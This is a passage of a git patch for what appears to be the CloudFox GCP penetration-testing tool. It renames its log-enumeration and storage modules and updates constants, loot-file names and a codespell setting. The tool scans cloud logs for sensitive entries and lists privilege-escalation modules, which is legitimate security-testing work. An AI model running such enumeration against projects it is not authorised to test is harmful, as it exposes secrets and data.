--max-entries Maximum log entries to process per project (default 50000) --log-name Optional: filter to a specific log name`, - Run: runGCPLogEnumCommand, + Run: runGCPLoggingEnumCommand, } func init() { - GCPLogEnumCommand.Flags().IntVar(&logEnumHours, "hours", 168, "Hours of logs to scan (default 168 = 7 days)") - GCPLogEnumCommand.Flags().IntVar(&logEnumMaxEntries, "max-entries", 50000, "Maximum log entries to process per project") - GCPLogEnumCommand.Flags().StringVar(&logEnumLogName, "log-name", "", "Optional: filter to a specific log name") + GCPLoggingEnumCommand.Flags().IntVar(&logEnumHours, "hours", 168, "Hours of logs to scan (default 168 = 7 days)") + GCPLoggingEnumCommand.Flags().IntVar(&logEnumMaxEntries, "max-entries", 50000, "Maximum log entries to process per project") + GCPLoggingEnumCommand.Flags().StringVar(&logEnumLogName, "log-name", "", "Optional: filter to a specific log name") } type LogEnumModule struct { @@ -66,8 +66,8 @@ type LogEnumOutput struct { func (o LogEnumOutput) TableFiles() []internal.TableFile { return o.Table } func (o LogEnumOutput) LootFiles() []internal.LootFile { return o.Loot } -func runGCPLogEnumCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGENUM_MODULE_NAME) +func runGCPLoggingEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGINGENUM_MODULE_NAME) if err != nil { return } @@ -85,13 +85,13 @@ func runGCPLogEnumCommand(cmd *cobra.Command, args []string) { func (m *LogEnumModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM(fmt.Sprintf("Scanning log entries (last %d hours, max %d entries per project)...", - m.Hours, m.MaxEntries), globals.GCP_LOGENUM_MODULE_NAME) + m.Hours, m.MaxEntries), globals.GCP_LOGGINGENUM_MODULE_NAME) - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGENUM_MODULE_NAME, m.processProject) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGENUM_MODULE_NAME, m.processProject) allEntries := m.getAllEntries() if len(allEntries) == 0 { - logger.InfoM("No sensitive log entries found", globals.GCP_LOGENUM_MODULE_NAME) + logger.InfoM("No sensitive log entries found", globals.GCP_LOGGINGENUM_MODULE_NAME) return } @@ -108,7 +108,7 @@ func (m *LogEnumModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(fmt.Sprintf("Found %d sensitive log entries (%d CRITICAL, %d HIGH)", - len(allEntries), criticalCount, highCount), globals.GCP_LOGENUM_MODULE_NAME) + len(allEntries), criticalCount, highCount), globals.GCP_LOGGINGENUM_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -123,7 +123,7 @@ func (m *LogEnumModule) getAllEntries() []logenumservice.SensitiveLogEntry { func (m *LogEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Scanning logs in project: %s", projectID), globals.GCP_LOGENUM_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Scanning logs in project: %s", projectID), globals.GCP_LOGGINGENUM_MODULE_NAME) } svc := logenumservice.New() @@ -131,7 +131,7 @@ func (m *LogEnumModule) processProject(ctx context.Context, projectID string, lo entries, err := svc.EnumerateSensitiveLogs(projectID, m.Hours, m.MaxEntries, m.LogNameFilter) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGENUM_MODULE_NAME, + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGINGENUM_MODULE_NAME, fmt.Sprintf("Could not scan logs in project %s", projectID)) return } @@ -145,7 +145,7 @@ func (m *LogEnumModule) processProject(ctx context.Context, projectID string, lo m.LootMap[projectID] = make(map[string]*internal.LootFile) } lootFile := &internal.LootFile{ - Name: "log-enum-commands", + Name: "logging-enum-commands", Contents: "# Cloud Logging Read Commands for Sensitive Entries\n# Generated by CloudFox\n\n", } for _, entry := range entries { @@ -155,7 +155,7 @@ func (m *LogEnumModule) processProject(ctx context.Context, projectID string, lo entry.InsertID, projectID, ) } - m.LootMap[projectID]["log-enum-commands"] = lootFile + m.LootMap[projectID]["logging-enum-commands"] = lootFile } m.mu.Unlock() } @@ -201,7 +201,7 @@ func (m *LogEnumModule) buildTablesForProject(projectID string) []internal.Table } return []internal.TableFile{ { - Name: "log-enum", + Name: "logging-enum", Header: m.getHeader(), Body: m.entriesToTableBody(entries), }, @@ -235,7 +235,7 @@ func (m *LogEnumModule) writeHierarchicalOutput(ctx context.Context, logger inte pathBuilder := m.BuildPathBuilder() err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGENUM_MODULE_NAME) + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGINGENUM_MODULE_NAME) } } @@ -247,7 +247,7 @@ func (m *LogEnumModule) writeFlatOutput(ctx context.Context, logger internal.Log tables := []internal.TableFile{ { - Name: "log-enum", + Name: "logging-enum", Header: m.getHeader(), Body: m.entriesToTableBody(allEntries), }, @@ -272,6 +272,6 @@ func (m *LogEnumModule) writeFlatOutput(ctx context.Context, logger internal.Log err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGENUM_MODULE_NAME) + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGINGENUM_MODULE_NAME) } } diff --git a/globals/gcp.go b/globals/gcp.go index 6b82599e..1b6bb53b 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -3,7 +3,7 @@ package globals // Module names const GCP_ARTIFACT_RESGISTRY_MODULE_NAME string = "artifact-registry" const GCP_BIGQUERY_MODULE_NAME string = "bigquery" -const GCP_BUCKETS_MODULE_NAME string = "buckets" +const GCP_STORAGE_MODULE_NAME string = "storage" const GCP_INSTANCES_MODULE_NAME string = "instances" const GCP_IAM_MODULE_NAME string = "iam" const GCP_PERMISSIONS_MODULE_NAME string = "permissions" @@ -51,8 +51,8 @@ const GCP_KEYS_MODULE_NAME string = "keys" const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" const GCP_PRIVESC_MODULE_NAME string = "privesc" const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" -const GCP_BUCKETENUM_MODULE_NAME string = "bucket-enum" -const GCP_LOGENUM_MODULE_NAME string = "log-enum" +const GCP_STORAGEENUM_MODULE_NAME string = "storage-enum" +const GCP_LOGGINGENUM_MODULE_NAME string = "logging-enum" const GCP_BIGQUERYENUM_MODULE_NAME string = "bigquery-enum" const GCP_BIGTABLEENUM_MODULE_NAME string = "bigtable-enum" const GCP_SPANNERENUM_MODULE_NAME string = "spanner-enum" diff --git a/internal/gcp/base.go b/internal/gcp/base.go index 3d374fa1..2c6a8dc2 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -405,8 +405,8 @@ type ProjectProcessor func(ctx context.Context, projectID string, logger interna // // Usage: // -// func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { -// m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) +// func (m *StorageModule) Execute(ctx context.Context, logger internal.Logger) { +// m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGE_MODULE_NAME, m.processProject) // m.writeOutput(ctx, logger) // } func (b *BaseGCPModule) RunProjectEnumeration( @@ -491,7 +491,7 @@ func parseMultiValueFlag(flagValue string) []string { // // Usage: // -// cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) +// cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGE_MODULE_NAME) // if err != nil { // return // error already logged // } From a3d1c09558e9bbbc33cd3c2d4ea94ffd2dc982e1 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 26 Feb 2026 16:32:53 -0500 Subject: [PATCH 48/48] fixed codespell referer error --- .github/workflows/codespell.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/codespell.yml b/.github/workflows/codespell.yml index 75fc0b54..5fdcfe1c 100644 --- a/.github/workflows/codespell.yml +++ b/.github/workflows/codespell.yml @@ -13,4 +13,4 @@ jobs: steps: - uses: actions/checkout@v4 - run: pip install --user codespell - - run: codespell --ignore-words-list="aks" --skip="*.sum" + - run: codespell --ignore-words-list="aks,referers,invokable" --skip="*.sum"